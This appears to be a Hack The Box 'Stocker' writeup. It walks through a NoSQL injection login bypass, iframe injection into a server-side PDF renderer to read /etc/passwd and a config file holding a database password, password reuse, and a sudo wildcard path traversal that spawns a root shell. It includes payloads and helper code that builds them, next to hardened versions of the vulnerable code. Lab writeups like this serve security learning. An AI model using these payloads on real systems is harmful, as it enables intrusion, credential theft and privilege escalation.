IT and security stuff

HTB – Stocker Writeup

Recon

Nmap

Directory listing

Nothing of interest…

The web app

Entering the IP as a URL redirects to stocker.htb; let's add it to our hosts file.
Found nothing of interest on the web app itself, so let's enumerate sub-domains.
Found dev as a sub-domain! Let's add dev.stocker.htb to the hosts file as well.
I tried various authentication bypasses such as default creds and SQLi, and none of them worked. The next step is to try NoSQL injection, as described at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#post-with-json-body

Exploit

Auth Bypass

Sending the payload as regular form data did not work, so I sent it as a JSON body instead.
It worked: I am redirected to /stock.
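The reason the JSON body works where form data did not is that a JSON object survives parsing as an object, so a query operator such as $ne reaches the database query intact. The following is an added example, not the Stocker app's code: a toy model of the login lookup (a constructed user table and a tiny subset of MongoDB's operator semantics) so the bypass and its fix can be run offline.

```javascript
// Added example, not the Stocker source. Constructed sample user; the
// plaintext password is only there to keep the toy short.
const users = [{ username: "admin", password: "s3cret" }];

// Subset of MongoDB query semantics: a scalar condition means equality, an
// object with "$ne" means "not equal". This is the property a JSON body
// abuses: the app expects a string, the driver happily accepts an operator.
function fieldMatches(stored, cond) {
  if (cond !== null && typeof cond === "object" && !Array.isArray(cond)) {
    if (Object.prototype.hasOwnProperty.call(cond, "$ne")) return stored !== cond.$ne;
    throw new Error("unsupported operator in toy matcher");
  }
  return stored === cond;
}

// Vulnerable pattern: req.body values go straight into the query, the
// equivalent of User.findOne({ username: req.body.username, password: req.body.password }).
function findUserVulnerable(body) {
  return users.find(u => fieldMatches(u.username, body.username) &&
                         fieldMatches(u.password, body.password)) || null;
}

// Hardened pattern: refuse anything that is not a plain string before it
// can reach the query, so operators can never be smuggled in.
function findUserHardened(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") return null;
  return users.find(u => u.username === body.username && u.password === body.password) || null;
}

// The bypass payload exactly as it travels in the JSON request body.
const bypassBody = JSON.parse('{"username": {"$ne": null}, "password": {"$ne": null}}');
```

Note that the same characters sent as a plain form field arrive as the string '{"$ne": null}', which is compared for equality and matches nothing; only a body parser that produces nested objects turns the text into an operator. Libraries such as express-mongo-sanitize strip keys beginning with $ for the same reason, but type-checking the credentials is the simpler and more robust fix.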

PDF Injection

Clicking “here” brings us to a Purchase Order in PDF

The following is the request that was made to purchase an Axe.

Let's try changing some values to see what we can control.
I changed Axe to EVIL in the POST request.
Looking at the console we can see the app

A quick Google search led me here: https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file

Apparently we can inject HTML/XSS into the PDF, which can lead to SSRF: the headless renderer that builds the PDF fetches whatever we point it at, local files included.
The Skia/PDF module is vulnerable to IFrame XSS.
<iframe src=/etc/passwd height=1000 width=1000></iframe>
The rendered /etc/passwd lists the users angoose and mongodb, which reveals that a MongoDB instance is in place.

Maybe we can get info from the database.

<iframe src=/etc/nginx/nginx.conf height=1000 width=1000></iframe>
/etc/nginx/nginx.conf revealed the root of the web app to be /var/www/dev/

Let’s see if I can find any interesting files in that directory!

Reading /var/www/dev/index.js the same way reveals the DB password.
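The root cause of the PDF file read is that an order field is concatenated unescaped into the HTML that a headless browser renders to PDF, so an injected iframe is rendered with the server's privileges; a relative src such as /etc/passwd is resolved against the document's base URL, which for HTML loaded from a local file is file:///etc/passwd. The following is an added example, not the app's code: the basket shape and the field name "title" are assumptions (the writeup only shows the item name being replaced), and it shows the vulnerable template beside an escaped one.

```javascript
// Added example, not the Stocker source. Builds the injected purchase body
// for a given local path; the basket layout and "title" field are assumed.
function craftOrderBody(localPath) {
  const payload = `<iframe src=${localPath} height=1000 width=1000></iframe>`;
  return JSON.stringify({
    basket: [{ _id: "000000000000000000000000", title: payload, price: 12, amount: 1 }],
  });
}

// Vulnerable pattern: untrusted fields are concatenated into the HTML that a
// headless browser (Skia/PDF) renders, so the iframe is a live element and
// the renderer, not the user, loads the referenced file into the document.
function renderOrderHtmlVulnerable(order) {
  const rows = order.basket
    .map(i => `<tr><td>${i.title}</td><td>${i.price}</td><td>${i.amount}</td></tr>`)
    .join("");
  return `<html><body><h1>Purchase Order</h1><table>${rows}</table></body></html>`;
}

// Minimal HTML escaping for text nodes and attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Hardened pattern: every untrusted field is escaped before it touches the
// template, so the payload appears as literal text in the PDF.
function renderOrderHtmlHardened(order) {
  const rows = order.basket
    .map(i => `<tr><td>${escapeHtml(i.title)}</td><td>${escapeHtml(i.price)}</td><td>${escapeHtml(i.amount)}</td></tr>`)
    .join("");
  return `<html><body><h1>Purchase Order</h1><table>${rows}</table></body></html>`;
}

// Crude regression check: does the rendered HTML still contain a tag that
// loads a resource or runs code? Useful as a unit test on the template.
function containsActiveMarkup(html) {
  return /<(iframe|script|object|embed|img|link|meta)\b/i.test(html);
}
```

Escaping closes the injection, but the dangerous capability is the renderer's ability to read local files at all; in practice the PDF generator should also run with file:// access disabled and in a sandbox with no credentials on disk, so a future injection bug cannot be turned into a file read again.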

Foothold/User

The DB password is reused by the user angoose, so it works to log in as that user.
I can run /usr/bin/node /usr/local/scripts/*.js with sudo. That's an easy one!

Root

From GTFOBins: create a .js file that spawns a shell.
Since the sudo rule contains a wildcard (/usr/local/scripts/*.js) in node's argument, and sudo matches wildcards in arguments across slashes, we can point it at any .js file we control by path traversal from /usr/local/scripts/ instead of having to write into that directory.
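The traversal works because sudoers matches command-line arguments with fnmatch(3) without FNM_PATHNAME, so * also matches /; for the command path itself a slash is not matched by wildcards, which is why this trick depends on the wildcard being in node's argument. The following is an added example, not from the box or GTFOBins' own code: it emulates that argument matching, builds the traversal argument, and carries the shell payload. It assumes the controlled file is written to /tmp/shell.js.

```javascript
// Added example, not from the Stocker box. Assumption: our payload lives at
// /tmp/shell.js. Usage on the target once that file exists:
//   sudo /usr/bin/node /usr/local/scripts/../../../tmp/shell.js

// Payload from GTFOBins: node spawns a shell that inherits our terminal.
const SHELL_JS = 'require("child_process").spawn("/bin/sh", { stdio: [0, 1, 2] });';

// Toy emulation of how sudoers matches an argument: fnmatch(3) without
// FNM_PATHNAME, so "*" and "?" also match "/". Only * and ? are handled.
function globToRegExp(pattern) {
  let re = "^";
  for (const ch of pattern) {
    if (ch === "*") re += ".*";
    else if (ch === "?") re += ".";
    else re += ch.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  }
  return new RegExp(re + "$");
}

function sudoArgMatches(pattern, arg) {
  return globToRegExp(pattern).test(arg);
}

// Build an argument that satisfies the pattern yet resolves to our file:
// one ".." per component of the allowed directory, then the target path.
function traversalArg(allowedDir, target) {
  const dir = allowedDir.replace(/\/$/, "");
  const depth = dir.split("/").filter(Boolean).length;
  return dir + "/..".repeat(depth) + "/" + target.replace(/^\//, "");
}

// Resolve "." and ".." the way the kernel will when node opens the file.
function resolvePosix(p) {
  const out = [];
  for (const part of p.split("/")) {
    if (part === "" || part === ".") continue;
    if (part === "..") out.pop();
    else out.push(part);
  }
  return "/" + out.join("/");
}
```

The same reasoning tells you how to write the rule safely: drop the wildcard and list the scripts explicitly, or at least keep the scripts directory root-owned and accept that a wildcard argument can be traversed.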

I AM ROOT!
